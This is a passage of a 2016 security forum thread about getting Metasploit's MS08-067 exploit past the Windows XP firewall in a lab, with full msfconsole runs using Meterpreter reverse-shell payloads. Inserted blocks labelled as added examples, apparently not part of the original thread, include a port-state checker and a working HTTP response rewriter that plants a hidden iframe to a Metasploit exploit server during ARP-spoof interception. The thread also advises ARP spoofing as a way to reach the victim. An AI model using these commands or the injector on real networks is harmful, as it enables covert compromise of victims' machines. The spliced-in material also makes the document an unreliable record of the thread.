pierre Posted April 12, 2016

Hello, I am actually working on this exploit. It works well when the XP firewall is turned off. Unfortunately, when I turn it on, the exploit doesn't work anymore.

Topology:

Procedure:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ms08_067_netapi) > check
[*] 192.168.0.3:445 - Cannot reliably check exploitability.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.0.1:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).
[*] Exploit completed, but no session was created.

Have you got any clue to bypass the Windows firewall?!
ale Posted April 13, 2016

Try using the reverse_https payload instead of tcp. See if that works while the firewall is enabled. BTW, which MS XP version are you testing against?
i8igmac Posted April 13, 2016

I think the firewall blocks incoming port 445. Exploit fails.
pierre (Author) Posted April 13, 2016

> Try using the reverse_https payload instead of tcp. See if that works while the firewall is enabled. BTW, which MS XP version are you testing against?

I tried both the http and https payloads, no results:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(ms08_067_netapi) > check
[*] 192.168.0.3:445 - Cannot reliably check exploitability.
msf exploit(ms08_067_netapi) > exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(ms08_067_netapi) > check
[*] 192.168.0.3:445 - Cannot reliably check exploitability.
msf exploit(ms08_067_netapi) > exploit
[*] Started HTTP reverse handler on http://0.0.0.0:8080/
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445).
[*] Exploit completed, but no session was created.

I am trying to exploit a Windows XP SP2.

> I think the firewall blocks incoming port 445. Exploit fails.

Yes, but because the destination port is 80 with the http payload, I thought it wouldn't block anymore..
i8igmac Posted April 13, 2016 (edited April 13, 2016 by i8igmac)

With the firewall turned on, run an nmap port scan on 445. Metasploit says the connection timed out on port 445.
pierre (Author) Posted April 14, 2016

root@osboxes:~# ping 192.168.0.3
PING 192.168.0.3 (192.168.0.3) 56(84) bytes of data.
^C
--- 192.168.0.3 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 2016ms
root@osboxes:~# nmap -p 445 192.168.0.3
Starting Nmap 7.01 ( https://nmap.org ) at 2016-04-14 11:17 EDT
Nmap scan report for 192.168.0.3
Host is up (0.00048s latency).
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
MAC Address: 08:00:27:A5:80:AD (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds

The firewall is well activated, so port 445 is filtered and doesn't respond to connection attempts, so Metasploit fails, right?
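The diagnosis in the post above, as an added example (not code from the thread): the same TCP connect Metasploit has to complete to 192.168.0.3:445 before it can send the MS08-067 request, done with plain sockets so the three outcomes are visible. A connect that times out means the SYN is dropped silently (nmap's "filtered", the XP firewall case); a refused connect means an RST came back ("closed"); a completed handshake means "open". The target host and port in the usage line are assumptions taken from the thread.

```python
import socket
from typing import Tuple

# Added example, not from the thread. Reproduces the nmap "filtered" diagnosis
# with a raw TCP connect, which is exactly what the exploit module does first.


def classify_error(exc: BaseException) -> str:
    """Map the exception raised by socket.connect() to an nmap-style state."""
    if isinstance(exc, (socket.timeout, TimeoutError)):
        return "filtered"      # no SYN-ACK and no RST: packets silently dropped
    if isinstance(exc, ConnectionRefusedError):
        return "closed"        # RST received: host reachable, nothing listening
    if isinstance(exc, OSError):
        return "unreachable"   # e.g. no route to host, network is down
    raise exc


def classify_port(host: str, port: int, timeout: float = 3.0) -> str:
    """Return 'open', 'closed', 'filtered' or 'unreachable' for host:port."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except OSError as exc:
        return classify_error(exc)
    finally:
        s.close()


def exploit_can_reach(state: str) -> bool:
    """MS08-067 needs an inbound TCP connection to port 445 on the target.
    Only an 'open' port lets the exploit request through; the payload's
    callback direction (reverse_tcp/http/https) plays no part at this stage."""
    return state == "open"


def start_local_listener() -> Tuple[socket.socket, int]:
    """Listener on an ephemeral loopback port, used to demo the 'open' case."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    srv, port = start_local_listener()
    print("127.0.0.1:%d ->" % port, classify_port("127.0.0.1", port))   # open
    srv.close()
    print("127.0.0.1:%d ->" % port, classify_port("127.0.0.1", port))   # closed
    # The firewalled XP box from the thread (assumed to be at 192.168.0.3):
    state = classify_port("192.168.0.3", 445)
    print("192.168.0.3:445 ->", state, "| exploit can reach:", exploit_can_reach(state))
```

Against the XP SP2 box with the firewall on, this returns "filtered" for 445, which is the same condition Metasploit reports as Rex::ConnectionTimeout; switching the payload cannot change it because the payload only runs after the exploit request has been delivered.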
i8igmac Posted April 14, 2016

Looks about right... this firewall won't let connections in BUT outbound traffic is allowed; you can exploit this with a crafted web link. You should look into client-side attacks for port 445... Metasploit will launch a web server hosting exploit code; when the target machine clicks the link, you should see the magic happen. This also means your payload should be configured as a reverse shell of some kind.
i8igmac Posted April 14, 2016 (edited April 14, 2016 by i8igmac)

https://blog.g0tmi1k.com/2011/01/owning-windows-xp-sp2-vs/

Client-side attacks... try this tutorial.
pierre (Author) Posted April 20, 2016

> Looks about right... this firewall won't let connections in BUT outbound traffic is allowed; you can exploit this with a crafted web link. You should look into client-side attacks for port 445... Metasploit will launch a web server hosting exploit code; when the target machine clicks the link, you should see the magic happen. This also means your payload should be configured as a reverse shell of some kind.

Hmm, so first the client has to be social-engineered.
i8igmac Posted April 20, 2016

Not exactly social engineering, you can ARP spoof and inject an iframe src=metasploit.link exploit. It can happen in the background when the client is web surfing.
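The rewriting step of the in-path attack described in the post above, as an added example (not code from the thread or from the linked tutorial). It assumes ARP spoofing has already put you between the XP box and its gateway (the spoofing itself is not implemented here): every plain text/html response going back to the victim gets a hidden iframe pointing at a Metasploit browser-exploit server, and Content-Length is corrected so the browser renders the longer page. The handler URL http://192.168.0.1:8080/ and the sample responses are constructed for the example.

```python
import re
from typing import Dict, Optional, Tuple

# Added example, not from the thread. Rewrites one HTTP/1.x response in flight
# so the victim's browser silently loads the exploit server in an iframe.

IFRAME = b'<iframe src="%s" width="0" height="0" style="display:none"></iframe>'


def parse_response(raw: bytes) -> Optional[Tuple[bytes, Dict[bytes, bytes], bytes]]:
    """Split one HTTP/1.x response into (status line, lower-cased headers, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inject_iframe(raw: bytes, url: str) -> bytes:
    """Return the response with the iframe inserted before </body>, or unchanged
    when it is not plain text/html (non-HTML, compressed or chunked bodies)."""
    parsed = parse_response(raw)
    if parsed is None:
        return raw
    status, headers, body = parsed
    if not headers.get(b"content-type", b"").lower().startswith(b"text/html"):
        return raw
    # A real injector strips Accept-Encoding from the request so the server
    # answers uncompressed; here compressed or chunked bodies are just skipped.
    if headers.get(b"content-encoding") or b"chunked" in headers.get(b"transfer-encoding", b"").lower():
        return raw
    tag = IFRAME % url.encode()
    m = re.search(rb"</body\s*>", body, re.IGNORECASE)
    new_body = body[:m.start()] + tag + body[m.start():] if m else body + tag
    # Keep every header verbatim except Content-Length, which must match the
    # longer body or the browser truncates (or hangs waiting for) the page.
    out = [status]
    for line in raw.partition(b"\r\n\r\n")[0].split(b"\r\n")[1:]:
        if line.partition(b":")[0].strip().lower() != b"content-length":
            out.append(line)
    out.append(b"Content-Length: " + str(len(new_body)).encode())
    return b"\r\n".join(out) + b"\r\n\r\n" + new_body


# Constructed sample responses (not captured traffic).
HTML_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: 40\r\n"
    b"\r\n"
    b"<html><body><h1>Hello</h1></body></html>"
)
JSON_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: 12\r\n"
    b"\r\n"
    b'{"ok": true}'
)

if __name__ == "__main__":
    # Assumed Metasploit browser-exploit handler on the attacker box.
    print(inject_iframe(HTML_RESPONSE, "http://192.168.0.1:8080/").decode())
    assert inject_iframe(JSON_RESPONSE, "http://192.168.0.1:8080/") == JSON_RESPONSE
```

In practice the function sits behind a transparent proxy or an ettercap/mitmproxy-style filter that the ARP spoof feeds; it touches only uncompressed HTML, so the request side has to drop Accept-Encoding first, and it must not be run outside a lab you own or are authorised to test.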
pierre (Author) Posted April 21, 2016

Thanks, I'll have a look at the tutorial :)